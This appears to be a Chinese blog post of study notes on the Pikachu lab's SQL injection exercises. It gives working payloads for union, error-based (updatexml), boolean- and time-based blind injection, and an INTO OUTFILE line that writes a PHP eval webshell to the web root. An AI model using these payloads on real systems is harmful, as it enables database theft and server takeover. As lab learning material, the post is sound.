D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)

最新推荐文章于 2022-12-12 12:53:01 发布
最新推荐文章于 2022-12-12 12:53:01 发布
阅读量640 收藏 1
点赞数
分类专栏: 刑呀 渗透测试 文章标签: 渗透测试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60071324/article/details/119333729
版权

避免的唯二方法

  • 不要创建包含外部数据的 SQL 语句。
  • 使用参数化 SQL 调用。

目录

首先

select a,b from c where id=1

xxx' or 1=1#'

xxxx%' or 1=1#

' 可以检测是否可以sql注入

a 'union select database(),user()## 通过union查询信息

a' order by 3#查看第三行 看到底有没有这些数据

updatexml() extractvalue() floor()

盲注

一句话木马

暴力破解

首先

很早就接触了SQL注入 对它还是买油兴趣的 一定要自己有兴趣才好 当时的感觉是 哇 竟然可以这样看数据 也太好了 所以这个兴趣一直也没有减弱 现在再来温习温习

select a,b from c where id=1

xxx' or 1=1#'

xxxx%' or 1=1#

' 可以检测是否可以sql注入

a 'union select database(),user()## 通过union查询信息

a' order by 3#查看第三行 看到底有没有这些数据

报错获取信息:是通过指定的函数来制造报错,从而从报错信息中获取设定的信息。
条件就是后台没有屏蔽数据库报错信息,在语法出现错误时,会输出在前端。

updatexml() extractvalue() floor()

updatexml():是mysql对xml文档数据进行查询和修改的XPATH函数
extractvalue():是mysql对xml文档进行数据进行查询和修改的XPATH函数
floor():是mysql中用来取整的函数

kobe' and updatexml(1,concat(0x7e,database()),0)#

盲注

之所以选择盲注 是因为后台和页面并不会提供相应的反应 所以自己得不到反馈 也就不知道是否已经进行了注入

based boolean:m没有报错信息 实惠显示0或1 再正确的输入下 输入and1=1/and1=2发现可以判断

由这个select ascii(substr(database(),1,1))>150;得
kobe' and ascii(substr(database(),1,1))=10#


baesd time:
基于时间的延迟
kobe'and if(substr(database(),1,1))='p',sleep(5),null)#

一句话木马


一种短小精悍的木马客户端 隐蔽性好 功能强大

前提条件:
需要知道远程目录 
需要远程目录有写权限 
需要数据库开始secure_file_priv

获取操作系统的权限:
kobe' union select "<?php @eval($_GET['test'])?>",2 into outfile "/var/www/html/1.php"


暴力破解


暴力破解表名和列名称:
kobe' and exists(select * from aa)#
boke' and exists(select * from users)#

sql流程

第一步 注入点探测

第二步 信息获取 获得预期的数据

第三步 获取权限 上传木马

1’ or 1=1#'

原本的意思是通过输入的id然后获得名字和姓氏

但是这么输入就是把原本id等于第一个1的数据输出出来,但是后面又由于含有or 因此,会输出所有的用户的数据

当不知道里面是什么内容的时候,运用sql语句中的like语法

xx%' or 1=1#' 从而也可以得到相同的结果

只查看表的信息有些局限性 因此想查看其他的数据 但是要符合数据库的语法 就要查看具体表格是几行几列的 所以使用order by 来查看一共有几行

因为表有几行 才能在自己写的时候写入几个 不然报错

可以使用 1' order by3#查看是否有第三行 类似的语句

由此可以断定此表只有两行

然后输入想查询的数据的语句 进行查询

a' union select database(),user()#

运用联合查询语句从而得到想要的信息

一只小小明
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
暴力破解一句话木马密码
爆破胡同的博客
01-12 7865
破解一句话木马 暴力破解
pikachu靶场 利用Rce上传一句话木马案例(工具:中国蚁剑)
最新发布
m0_46745664的博客
06-30 817
pikachu靶场 利用Rce上传一句话木马案例(工具:中国蚁剑)
暴力破解与上传漏洞-利用一句话木马和中国菜刀上传漏洞获取权限
TheMagicMeHappy的博客
09-15 2021
知识储备: web后门(泛指webshell)可提供的功能 执行命令; 浏览文件; 辅助提权; 执行SQL语句; 反弹Shell; web后门基本原理 制作一个一句话木马php或者其他格式文件 上传到目标服务器中 利用中国菜刀这类后门软件访问一句话木马文件 参考资料——《Web安全攻防:渗透测试实战指南》 参考资料——https://blog.csdn.net/xxxslinyue/art...
pikachu之文件包含漏洞
weixin_51446936的博客
06-09 2147
一、文件包含漏洞概述 在web后台开发中,程序员往往为了提高效率以及让代码看起来更简洁,会使用“包含”函数功能。比如把一系列功能函数都写进function.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句<?php include function.php?>就可以调用函数代码 但有些时候,因为网站功能需求,会让前端用户选择需要包含的文件(或者在前端的功能中使用了“包含”功能),又由于开发人员没有对要包含的这个文件进行安全考虑,就导致攻击者可以通过修改包含文件的位置来让后台执行任意
pikachusql注入漏洞
weixin_51446936的博客
06-07 1093
一、SQL Inject漏洞原理概述 1.概述: 数据库注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击着可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄露的一种漏洞 2.攻击流程 第一步:注入点探测 自动方式:使用web漏洞扫描工具,自动进行注入点发现 手动方式:手工构造sql inject测试语句进行注入点发现 第二步:信息获取 通过注入点取期望得到的数据 (1)环境信息:数据库类型,数据库版本,操作系统版本,用户信息等 (2)数据库
pikachu基于表单的的暴力破解low
06-06
个人创作
第16天:WEB漏洞-SQL注入之查询方式及报错盲注1
08-03
3. **基于报错的SQL盲注**:通过让数据库产生错误并观察错误信息来获取数据,例如使用`floor`、`updatexml`或`extractvalue`函数。攻击者可以构造特定的SQL语句,使数据库在处理时出错,从而揭示部分信息。 **示例...
sql注入 pikachu post数字型注入
08-12
SQL 注入 Pikachu Post 数字型注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字型注入方法,即使用 ...
pikachu.rar
03-05
"Pikachu.rar" 是一个专为Web安全攻防设计的压缩包文件,其主要内容是搭建一个详尽的漏洞平台,便于用户进行SQL注入测试以及靶场环境的构建。在这个环境中,我们可以模拟真实的网络攻防场景,对Web应用的安全性进行...
pikachu靶场SQL注入.docx
09-13
Pikachu靶场SQL注入是针对Web应用程序的一种攻击手段,通过对Web应用程序的输入参数进行tampering,来达到访问数据库的目的。下面是Pikachu靶场SQL注入的详细知识点: 一、数字型注入(POST) 数字型注入是指在Web...
Pikachu靶场之文件包含漏洞详解
m0_46467017的博客
05-19 6870
Pikachu靶场之文件包含漏洞详解前言文件包含漏洞简述1.漏洞描述2.漏洞原因3.漏洞危害4.如何防御第一关 File Inclusion(local)1.尝试读取"隐藏"文件2.读取不同文件夹文件3.读取系统文件4.结合文件上传getshell第二关 File Inclusion(remote)包含写木马的文件 前言 本篇文章用于巩固对自己文件包含漏洞的学习总结,其中部分内容借鉴了以下博客。 链接: pikachu File Inclusion 文件包含漏洞 (皮卡丘漏洞平台通关系列) 链接: 【
暴力破解到getshell
07-13
暴力破解到getshell视频教程,本课程通过暴力破解获取后台管理权限,通过上传一句话木马,获取服务器权限。通过案例操作详细讲解该种类型漏洞利用过程中所需要得知识,并针对研发讲解了该漏洞得修复方案,从攻击和防守两个方面完美展示该漏洞。
pikachu靶场-4 SQL注入漏洞
weixin_52180702的博客
12-12 2211
既然在页面上只能判断真假,那么这个时候我们就可以对数据库里面的结果去按照刚才的方法去截取一个字符,转换成ASCII码然后去进行比较,只不过这个方式会很麻烦,因为盲注这种情况你没法通过页面上的返回来直接拿数据,你只能通过这种猜测的方式(真或者假)去一步一步猜测后面的数据,所以盲注如果要手工利用的话会非常的麻烦,非常的耗时间,我们在搞懂盲注原理的情况下,可以使用工具去进行自动化的测试。那就需要结合我们的经验和我们的想象了,多去做一些payload的测试,根据返回结果来判断我们是否打中了。
php一句话木马
热门推荐
zlloveyouforever的博客
03-30 1万+
pikachu漏洞测试平台使用php一句话木马利用文件上传漏洞以及文件包含漏洞。
pikachu注入漏洞演示3
weixin_44722125的博客
04-04 1082
sql-inject 漏洞-盲注 盲注: 基于真假的盲注 先用字符串测试一下 发现不行 再试试 因为kobe存在,and 1=1为真 所以被写入后台,所以存在sql注入 用之前基于报错的payload来试一下 kobe’ and extractvalue(0,concat(0x7e,version()))# 不行 ...
UEFI-dsc.dec.fdf文件
m0_49918601的博客
09-10 703
UEFI-dsc.dec.fdf文件   上一篇介绍了 .inf文件, .inf文件相当于Visual Studio中的工程文件。而 .dsc(Platform Description File)则相当于Visual Studio中的 solution 文件。每个包都要包含一个.dec(Package Declaration File)文件、一个 .dsc文件。如果这个包还用于固件Iamge或Option Rom Image的生成,则还需要添加 .fdf(Flash Description File)文件.
Pikachu靶场之RCE漏洞详解
m0_46467017的博客
05-18 6337
Pikachu靶场之RCE漏洞详解漏洞简述诚意推荐靶场闯关第1关 exec “ping”源码分析:第2关 exec "eval"源码分析 漏洞简述 一、什么是RCE? RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 1、远程系统命令执行 出现原因:因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。 比如常见的路由器、防火墙、入侵检测等设备的web管理界面上,一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地
PHP网站常见“一句话木马”攻击解决办法
qq_21544229的博客
05-14 2111
如何破解PHP网站“一句话木马” PHP网站常见“一句话木马”攻击解决办法 近期,公司发布的PHP网站挂域名对外发布一段时间,发现经常遭到“一句话木马”攻击,日志上分析并没有找到原因,一切看起来正常,Win系统漏洞已经打满,PHP环境使用的是最新版PHP study,系统密码也更换成更复杂的,然而并没有什么用,估计是通过网站内的上传功能上传了PHP后缀的木马文件,内容如下截图: 解决方法 下载并安装360杀毒,如果条件允许,再装个360主机卫士: 当再次被攻击时,恶意上传的木马会被立即删除,如果木马文
pikachu sql 盲注
09-22
pikachu sql 盲注是指在使用sqlmap工具对pikachu数据库进行盲注攻击的过程。盲注是一种利用应用程序没有正确过滤或转义用户输入的漏洞,通过向数据库发送特定的查询语句来获取敏感信息的攻击方法。 在进行pikachu sql 盲注时,可以使用sqlmap工具中的一些命令来执行相关操作。例如,引用所示的命令可以用来列出pikachu数据库中的所有表格,引用所示的命令可以用来从pikachu数据库的users表格中获取用户名和密码,引用所示的命令可以用来列出pikachu数据库中users表格的所有列。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值